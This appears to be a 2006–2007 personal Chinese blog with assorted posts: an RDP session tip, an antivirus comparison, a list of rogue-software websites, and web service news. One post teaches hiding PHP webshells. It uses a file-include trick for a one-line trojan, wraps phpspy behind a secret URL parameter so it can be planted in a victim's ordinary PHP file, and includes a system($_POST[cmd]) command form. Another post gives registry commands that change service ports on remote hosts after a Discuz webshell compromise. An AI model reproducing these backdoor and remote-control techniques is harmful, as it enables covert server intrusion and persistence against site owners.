Thursday, March 8, 2007

车轮之迷。。。

在我住的小区里,有几辆车的轮胎边上一直会立着一块石绵瓦,久思不得其解!为什么会立块瓦呢?最初猜测,可能是车好,怕划伤轮盘~但很快这个猜想就被推翻了,因为那几辆放瓦的车,虽然也有好车,但还有几辆奥拓在其中!今天早起上班,见一妇人领着只散步,小狗见到车子,就跑过去,后腿一抬--尿了!方大悟!原来是为了防止狗狗尿尿在自己的车轮胎上!哈哈。
Posted by Wyulnnhtg at 08:42:32 | Permalink | No Comments »

Wednesday, March 7, 2007

远程桌面(3389)连接至指定会话(session)的方法.

不知道有没有人遇到过这样的变态问题,在管理服务器的时候,用远程桌面连接,在会话中还进行着任务的时候由于某种原因(断网或者误点)退出了远程桌面,之后再连的时候已经连不到原来的会话中了,而是新建立了一个会话,也看不到原来的会话中进行的任务了.现找到一办法和大家分享如下:

不管哪个会话,先登录进去…
CMD下输入
query session查看在进行任务那个会话的ID
然后再用tscon ID将当前会话转到需要的那个会话中 

原来的任务马上会重现眼前的…嘿嘿…

Posted by Wyulnnhtg at 04:16:43 | Permalink | No Comments »

Sunday, November 5, 2006

高人对四大杀毒软件的评价(卡巴 麦咖啡 诺顿 nod32)

一、卡巴就好象西毒,凶猛强悍,神功盖世,对敌决不留情,出手狠辣,招招夺命,绝少失手,不愧为一代枭雄,但毕竟练的不是纯正内功,容易走火入魔,导致系统出问题。

二、麦咖啡就象东邪,玉树临风,俊朗潇洒,对敌招式繁多,机关重重,杀伐决断从不迟疑,为江湖第一机智聪明之人,但因其心机太深,令人难以掌握。


三、诺顿就象南帝,雍容华贵,稳沉厚重,胸怀博大,练的是纯正内功,靠的是教化感人,对敌有慈悲心肠,一般采取隔离教化,使其不再作恶,很少杀人,称的上是一代宗师,但因其过于敦厚,不仅自己活的累,别人也为他感到累。

四、nod32就想北丐,来无影去无踪,潇潇洒洒,笑傲江湖,对敌用的是逍遥游和打狗棍法,江湖上少有对手,但因其过于轻浮,难免误事。

国产的就像全真七子 ,一起上还凑合。

Posted by Wyulnnhtg at 05:38:04 | Permalink | No Comments »

邪恶的GFW终于又露出獠牙了

    Google的Blogspot终于又被GFW挡在国门之外了。无奈,只好又返回Blog.Com。虽然这里的相册容量已经用尽,但Blog功能,说实话,还是真的很不错的!相册暂时延用Picasa。再次感谢GFW前段时间的仁慈之举。
Posted by Wyulnnhtg at 05:34:45 | Permalink | No Comments »

Monday, August 21, 2006

Blog搬家了……此Blog资源已尽~

10MB的相册空间和200MB/月的日志空间实在不够~
但没想到的是这么快就用尽了!

现将Blog转移至:
       http://wyulnnhtg.blogspot.com/

       相册转移至:
       http://picasaweb.google.com/wyulnnhtg

此Blog不再更新!但依然保留!

Posted by Wyulnnhtg at 06:34:29 | Permalink | Comments (6)

Saturday, August 19, 2006

3721.com重见天日

雅虎中国宣布启用”冷冻”了近一年的3721.com域名,并将在新的3721.com网站上推出个性化,交互式的中文上网服务.新的3721.com全面采用Ajax技术!据分析,强行剔除3721.com对阿里巴巴的经营和品牌造成相当大的损失,重启3721.com域名表明阿里巴巴的整合策略更加务实!
Posted by Wyulnnhtg at 02:29:46 | Permalink | No Comments »

Friday, August 18, 2006

揭开流氓软件背后的始佣者:中国十大流氓网站

以下是网易科技评选的十大流氓网站:
3721网站的出现注定会写入中国互联网历史.他的意义在于它将十年中国互联网分为了两段,一段是纯洁的互联网,一段就是一直到现在的互联网流氓时代.
当中国互联网进入2006年,丝毫没有看到流氓时代逝去的迹象,反而越演越烈.各式各样的流氓软件满天横飞,争吵与辱骂声也此起彼伏,不仅仅是用户与流氓软件之间,流氓软件与流氓软件之间也开始在前台争吵,呈现出一片欣欣向荣的景象,也带给枯燥的中国互联网江湖无穷的话题.
流氓软件为何这么猖獗,依然能够在网民的漫骂声中迅速发展呢?不用想肯定是利益在作怪。虽然有多种类型的企业为了不同的目的支撑了流氓软件生态链,但是仔细观察它的生态链之后,你会发现处理生态链最下游的广告主是关键,或许才是真正推动流氓软件行业的真正力量。

那么流氓软件的广告主是谁?豪无置疑,绝大部份就是网站,为了获取大量的流量或用户为目的的网站。因为装在数千万台不知情用户电脑的流氓插件可以使一个并不为人知的网站,在很短的时间里获取巨大的用户数和页面流量。正是这种效果驱使着一批网站不顾用户的感受,努力推动着流氓软件发展。当然网站向流氓软件购买流量这只是其中一类,通常情况下网站为了获取用户和流量还有两种策略,一种是自己制造流氓软件锁定用户,另一种是购买共享软件或与之合作,然后捆绑自己网站的插件,达到推广网站的目的,这些都是典型的流氓行为。

通过流氓软件运营网站的这种流氓行为显然也得到了资本市场的认可。 “现在做网站运营,有流氓软件支撑的比那些没有流氓软件,在资本市场会更容易受到认可。”一个创业网站的老总这样告诉笔者。从他的话中多多少少透露出行业对流氓软件的理解,在他们心里,并没有很多网友想象中的那种道德上的压力,对他们来说,这就是一条成功之路。

到今天,流氓的互联网时代也存在了7、8年的时间了,到底是哪些网站推动了流氓软件发展而从中获得利益呢?网易科技通过这段时间查询大量的信息,对很多用户进行详细的调查,与多位行业人士的沟通了解,与互联网观察人士一起分析探讨之后,得出了通过流氓软件发展前十的网站排名,暂且称之为十大流氓网站。排名主要参考了网站对流氓软件的推动及流氓软件对网站的效果两方面结合的效果。得预先说明的是,这下面的网站不代表现在的状态,虽然下面有些网站已经开始“转正”或者说“从良”了,数据可能反映他们过去一段时间的经历。

中国互联网十大流氓网站

1、3721.com(中文实名)

这个是流氓软件的开山鼻祖,就是因它将中国互联网带入到一个流氓时代,这里就不作再多说,相信大多数人都装过这个网站的插件。

2、MOP.com(猫扑)

猫扑从2004年开始流量一路狂涨,现在 Alexa 68位,这其中与它的“播霸”与前期与其它流氓合作推广是分开不的。

3、Zhongsou.com(中搜)

中搜在网友中的骂名是除了3721最大的,“网络猪”与“划词搜索”让无数的网友愤怒,而中搜在骂声中成长也比较快,流量提高了不少。

4、Sougou.com(搜狗)

中国的几个搜索引擎,特别是后来者,大多数都在用流氓插件,前面已经做了,没办法不做,对搜狗来说很值,提升很快。

5、51.com

基本上是靠流氓软件推起来的一个交友网站,网站的流量上升非常快,差点就挤上了Alexa前100名。

6、265.com(上网导航)

网上有人防杀流氓软件都分为几大系,其中就有一个叫蔡文胜系。

7、Bokee.com(博客网)

博客网曾经推出的一款博采的流氓插件,据说安装后会约每隔1秒点击博客网,够狠吧。

8、Qyule.com(青娱乐)

青娱乐也是网上被网友骂得最厉害的一个流氓网站,它的Alexa 排名数据不止一次清零,原因很可能是因流氓软件作弊所致。

9、9991.com(网址大全)

与51.com系出同门,很多用户访问过一次之后就将IE首页设置成了9991.com,在网络行业协会的流氓软件举报中心,它被举报次数居第一位,并且网上咨询怎么删除9991插件的问题也是最多的。

10、Yok.com(超级搜索)

这个没有任何技术含量的搜索网站,也能有一个不错的流量,它的“YOK搜索工具栏”功不可没。

最后值得一提的是,上面十大流氓网站只是一个典型,实际上还有很多备选的流氓网站也非常的流氓,但是从我们拟定的评判标准上看,他们的效果或推动流氓软件的程度略略低于选出来的十个网站,也许我们感到十分“遗憾”。

流氓网站先欺负网民,然后网民被动查看网站,部份网民在不知情的情况下转而日久生情,然后网站开始逐渐从良,最后网站获取成功。这是当前流氓网站的通常的发展路线图,不知道随着网民素质的提高,行业正义人士越来越来,这个发展路线图是否有所改变,这也是发布这个十大流氓网站的意义所在。

Posted by Wyulnnhtg at 14:34:19 | Permalink | No Comments »

Writely现在可直接注册

刚刚宣布,Writely现在开始面向所有互联网用户.不需要邀请或是写信给Writely.只需简单注册即可.

Writely网站是今年3月被google收购的.Writely网站的开发商曾是一个名为Upstartle的新创公司,其实只是一个三人开发小组.Writely网站相当于基于WEB的”Word”.用户不仅可以在线完成字处理工作,同时还可以同特定的同事好友共同编辑文档.这种模式十分适合多人参与的文档项目.

Posted by Wyulnnhtg at 14:23:56 | Permalink | Comments (1) »

Thursday, August 17, 2006

PHP后门隐藏

首先建立一PHP文件test.php 文件内容为:
  
  $test=$_GET['test'];

  @include ‘test/’.$test;

  ?>   

  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问http://localhost/test/test.php?test=../t.txt如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入http://localhost/test/test.php?test=../t.txt密码里添入cmd就可以了,执行返回的结果都可以看到。 


方法2现在的webshell是越来越流行了,连php的后门也追上来了,主要的有angel的phpspy和lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。 其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦)但是对于一般的站点这其实并不是很重要。 有没与想过把phpspy插到一个文件里去呢?没有想过吗? 呵呵,跟我来,我们用记事本打开phspy就好了,搜索登录入口四个字。 在

  function loginpage() { ?>    
后面加上  

<? if ($ _ GET[name] == wrsky) { ?>    
 再在  

<?php      exit;   }//end loginpage()      
 前面面加上  

 <? } ?>    
 现在你可以把这一个phpspy都写到对方的某个正常的php文件里,直接浏览是看不出问题的喔,我们要登录的时候就直接在文件名后面加上?name=wrsky才可以看到   当然你也可以改成别的,只要替代上面 代码 里的name和wrsky就可以的,相信自己动手你会觉得收获很大的。 如果你要自己改写一些简单的 代码 而你又不会php的话,这里就有样东西要介绍给你哦~php后门插入器,呵呵,你可以在http://www.wrsky.com  火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。  呵呵~红色的喔,粉PP吧~~我们来测试一下,我在这里提供一段 代码  

<center>执行CMD命令</center>  <form action= method=POST>  <center>想执行的命令:  <input name=cmd size=40 value=<?echo$cmd?>>  <input name=action type=hidden value=run>  <input type=submit class=INPUT value=执行<?echo PHP _ OS;?>系统命令></form>  <td align=center>  <textarea name=textarea cols=100 rows=25 readonly>  <?  if($ _ POST[action] == run){ @system($ _ POST[cmd]);  }  ?> </textarea>    
 这段 代码 是执行cmd命令的,我们利用插入 工具 进行插入看看! 没插入前的样子  我的设置为参数名为name,参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了,你也可以写成/home/imaboy/bk.php(因为这是 linux 系统) 显示写入文件成功,我们开始连接咱的 木马 ,以为我用的参数的name,值是wrsky,所以连接方式为 木马 所在地址?name=wrsky 大家可以看到,在输入后面的参数后运行完全正常,而且不易被发现喔,很可能被带到另外一台主机上去喔 。 ,
呵呵,只要想一点,你们肯定还会有更好的办法的!

Posted by Wyulnnhtg at 02:45:57 | Permalink | No Comments »

命令行方式修改远程任意端口

命令行方式下快速修改本地或远程端口(telnet termsrv w3svc smtp iis ftp )  
补充在DiscuzEXP下用MYPHPADMIN拿导出拿到的EWBSHELL是系统权限。可以执行任意命令

Reg add “\\ip\ HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber  

/t reg_dword /d 123 /f  
reg add “\\ip\ HKLM\SOFTWARE\Microsoft\TelnetServer\Defaults” /v telnetport /t reg_dword /d 123  

Reg add “\\ip\HKLM\SYSTEM\CurrentControlSet\Control\ServiceProvider\ServiceTypes\W3SVC” /v tcpport  
/t reg_dword /d 123 /f  

Reg add “\\ip\HKLM\SYSTEM\CurrentControlSet\Control\ServiceProvider\ServiceTypes\SMTPSVc” /v tcpport  
/t reg_dword /d 123 /f  

Reg add “\\ip\HKLM\SYSTEM\CurrentControlSet\Control\ServiceProvider\ServiceTypes\MSFTPSVC” /v tcpport  
/t reg_dword /d 123 /f  

Reg add “\\ip\HKLM\SYSTEM\CurrentControlSet\Control\ServiceProvider\ServiceTypes\ Microsoft Internet Information Server” /v tcpport  
/t reg_dword /d 123 /f  

若显示Error: The network path was not found.  
则说明对方没有开启Remote Registry Service服务  
可用一下命令:net start remoteregistry

Posted by Wyulnnhtg at 02:43:08 | Permalink | No Comments »